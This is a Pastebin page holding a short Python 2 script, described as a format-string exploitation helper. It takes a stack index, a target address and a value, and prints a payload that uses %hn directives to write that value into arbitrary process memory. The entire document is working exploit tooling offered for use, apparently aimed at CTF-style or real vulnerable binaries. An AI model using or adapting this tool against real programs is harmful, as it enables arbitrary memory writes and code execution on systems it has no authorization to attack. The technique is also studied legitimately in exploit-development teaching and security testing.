Guest User

Untitled

a guest
Dec 26th, 2014
585
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/python
  2. from struct import pack
  3. import sys
  4. # -----------------------------------------------------------------------------------
  5. # Title         : Formatstring vuln. explotation helper
  6. # About         : Creates a single/double short formatstring exploit pattern
  7. # Author        : r3v3rs3r
  8. # Date          : 24-12-2014
  9. # -----------------------------------------------------------------------------------
  10.  
  11.  
  12.  
  13. # -----------------------------------------------------------------------------------
  14. def p(v, e='<L'):
  15.     return pack(e, v)
  16.  
  17.  
  18. # -----------------------------------------------------------------------------------
  19. def rpad_short(i, l=5):
  20.     return str(i).rjust(l, '0')
  21.  
  22.  
  23. # -----------------------------------------------------------------------------------
  24. def single_short_pattern(stackindex, writetoaddress, value, currlen=0):
  25.     """
  26.     Pattern writes 2 bytes to a address
  27.    
  28.     stackindex          : The index of the input on stack
  29.     writetoaddress      : The address to write to
  30.     value               : The data to write(WORD)
  31.     currlen             : The current length of the data(default 0)
  32.     """
  33.    
  34.     # update currlen
  35.     currlen += 4
  36.    
  37.     # Calcutate the short value
  38.     len_1 = ((value & 0xFFFF) - currlen) & 0xFFFF
  39.    
  40.     # build and return the pattern
  41.     r =  p(writetoaddress)
  42.     r += '%{0}c%{1}$hn'.format(rpad_short(len_1), str(stackindex))
  43.  
  44.     return r
  45.  
  46.  
  47. # -----------------------------------------------------------------------------------
  48. def double_short_pattern(stackindex, writetoaddress, value, currlen=0):
  49.     """
  50.     Pattern writes 4 bytes to a address
  51.  
  52.     stackindex          : The index of the input on stack
  53.     writetoaddress      : The address to write to
  54.     value               : The data to write(DWORD)
  55.     currlen             : The current length of the data(default 0)
  56.     """
  57.    
  58.     # update currlen
  59.     currlen += 8
  60.    
  61.     # Calculate the 2 short values
  62.     len_1 = ((value & 0xFFFF) - currlen) & 0xFFFF
  63.     len_2 = ((((value >> 16) & 0xFFFF) - currlen) - len_1) & 0xFFFF
  64.    
  65.     # build and return the pattern
  66.     r =  p(writetoaddress)
  67.     r += p(writetoaddress + 2)
  68.     r += '%{0}c%{1}$hn'.format(rpad_short(len_1), str(stackindex))
  69.     if len_2 != 0:
  70.         r += '%{0}c%{1}$hn'.format(rpad_short(len_2), str(stackindex + 1))
  71.     else:
  72.         r += '%{0}$hn'.format(str(stackindex + 1))
  73.  
  74.     return r
  75.  
  76. # -----------------------------------------------------------------------------------
  77. def strtoint(intstr):
  78.     try:
  79.         if intstr.count('x'):
  80.             return int(intstr, 16)
  81.         else:
  82.             return int(intstr)
  83.     except Exception as e:
  84.         print 'Error strtoint: %s' % (e)
  85.         exit()
  86.  
  87.  
  88. # -----------------------------------------------------------------------------------
  89. def int_size(value):
  90.     i = (value | 0xFFFF)
  91.     if i == 0xFFFF:
  92.         return 1
  93.     elif i > 0xFFFF:
  94.         return 2
  95.     else:
  96.         return 0
  97.  
  98. # -----------------------------------------------------------------------------------
  99. if __name__ == '__main__':
  100.     if len(sys.argv) < 4:
  101.         print 'Usage: python frmtstr.py <stack_index> <write_to_address> <value_to_write> <current_length>(OPTIONAL)'
  102.     else:
  103.         stackindex = strtoint(sys.argv[1])
  104.         writetoaddress = strtoint(sys.argv[2])
  105.         value = strtoint(sys.argv[3])
  106.        
  107.         if len(sys.argv) == 5:
  108.             currlen = strtoint(sys.argv[4])
  109.         else:
  110.             currlen = 0
  111.  
  112.         patternsize = int_size(value)
  113.  
  114.         if patternsize == 1:
  115.             print single_short_pattern(stackindex, writetoaddress, value, currlen)
  116.         elif patternsize == 2:
  117.             print double_short_pattern(stackindex, writetoaddress, value, currlen)
  118.         else:
  119.             print 'Failed to Calculate the value size'
RAW Paste Data